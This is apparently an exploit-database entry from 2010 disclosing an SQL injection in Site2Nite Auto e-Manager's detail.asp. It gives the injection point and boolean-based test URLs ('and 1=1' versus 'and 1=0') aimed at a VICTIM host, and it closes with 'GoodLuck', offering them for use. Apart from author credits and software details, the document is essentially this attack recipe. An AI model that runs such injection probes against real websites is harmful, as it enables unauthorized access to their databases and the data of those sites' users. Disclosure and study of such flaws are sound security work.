[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Site2Nite Auto e-Manager SQL Injection Vulnerability
# Published : 2010-10-10
# Author : KnocKout
# Previous Title : Cilem Haber v1.4.4 (Tr) Database Disclosure Exploit (.py)
# Next Title : PHP-Fusion MG User-Fotoalbum SQL Injection Vulnerability
==================================================
Auto e-Manager <= SQL Injection Vulnerability
==================================================
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[+] Greatz : h4x0reSEC / Inj3ct0r Team / Exploit-DB
{ H4X0RE SECURITY PROJECT }
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Auto e-Manager
~Software: http://www.site2nite.com/
~Vulnerability Style : SQL Injection
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation~~~~~~~~~~~
http://VICTIM/www/detail.asp?ID=654 {SQL Injection}
http://VICTIM/www/detail.asp?ID=654 and 1=1 {True}
http://VICTIM/www/detail.asp?ID=654 and 1=0 {False}
================================
GoodLuck.